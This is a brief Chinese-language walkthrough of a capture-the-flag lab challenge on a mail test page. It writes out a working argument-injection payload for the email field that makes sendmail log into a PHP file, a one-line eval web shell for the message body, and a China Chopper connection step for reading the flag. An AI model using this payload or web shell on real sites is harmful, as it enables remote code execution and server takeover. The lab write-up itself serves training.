打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。
打开邮件测试页面。
使用邮件注入木马
You name:mozhe(随便输入)
Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/www/html/abc.php @abc.com(abc可更改)
You message:<?php @eval($_POST[abc]);?>(abc可更改)
注入木马后打开菜刀进行连接。
在/var/www/html/下没看到key文件,在/根目录下发现key文件。打开key.txt文件得到key。把key提交即可完成本题。